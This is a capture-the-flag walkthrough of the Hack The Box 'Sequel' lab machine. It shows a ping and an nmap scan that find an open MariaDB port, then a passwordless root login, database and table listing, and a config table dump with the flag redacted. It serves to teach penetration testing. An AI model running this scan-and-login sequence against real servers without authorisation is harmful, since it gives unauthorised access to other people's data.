---
sidebar_position: 2
sidebar_label: 🏪 Sequel
description: The second Tier 1 Machine has a database with a weak password.
last_update:
  date: 2022/06/10
  author: Raúl Sánchez
tags:
  - MySQL
  - MariaDB
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Sequel

> The second Tier 1 Machine has a database with a weak password.

## 0. Start the machine

To start machine, Just click "Spawn Machine".

![Spawn Sequel Machine](sequel1.png)

Then you can see the **IP** address for that machine. In this case the machine has the IP `10.129.211.52`. Before going to enumeration steps we can simply ping to the IP address and check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 10.129.211.52
PING 10.129.211.52 (10.129.211.52) 56(84) bytes of data.
64 bytes from 10.129.211.52: icmp_seq=1 ttl=63 time=57.4 ms

--- 10.129.211.52 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 57.377/57.377/57.377/0.000 ms
```

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## 1. Enumeration

The first thing to do is to identify which operating system you are using. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool to find out.

```python
❯ whichSystem.py 10.129.211.52

10.129.211.52 (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-](https://nmap.org/book/man-version-detection.html)d : set debugging level.
* \-sC : performs a script scan using the default set of scripts.

```python
❯ nmap -d -sC 10.129.211.52
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-10 16:31 CEST
PORTS: Using top 1000 ports found open (TCP:1000, UDP:0, SCTP:0)
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
NSE: Using Lua 5.3.
NSE: Arguments from CLI: 
NSE: Loaded 125 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Nmap scan report for 10.129.211.52
Host is up, received conn-refused (0.12s latency).
Scanned at 2022-06-10 16:31:17 CEST for 60s
Not shown: 999 closed tcp ports (conn-refused)
PORT     STATE SERVICE REASON
3306/tcp open  mysql   syn-ack
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 116
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, Support41Auth, SupportsLoadDataLocal, ODBCClient, Speaks41ProtocolNew, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, InteractiveClient, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, SupportsCompression, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: AuIN,0Jd9/!Uh,>77M^q
|_  Auth Plugin Name: mysql_native_password
```

We observe that port 3306/tcp is open. Which is running a [MySQL](https://www.mysql.com/)-[MariaDB](https://mariadb.org/) database.

:::note
**MariaDB** is a community-developed, commercially supported fork of the MySQL relational database management system, intended to remain free and open-source software under the GNU General Public License.
:::

## 2. Foothold

In order to communicate with the database, we need to install either `mysql` our local machine.

```bash
sudo apt install mysql*
```

After that, we will connect to the database, using `-h` to set the host and `-u` to specify the user.

```python
❯ mysql -h 10.129.211.52 -u root
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 123
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
```

We're in! Now we use the following `SQL` command to list all the databases.

```sql
MariaDB [(none)]> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.048 sec)
```

Later, we select the database `htb`. And show what is inside.

```sql
MariaDB [(none)]> USE htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]> SHOW TABLES;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.060 sec)
```

Finally, print out all the data from the table `config`.

```sql
MariaDB [htb]> SELECT * FROM config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | ████████████████████████████████ |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.057 sec)
```

There it is our flag!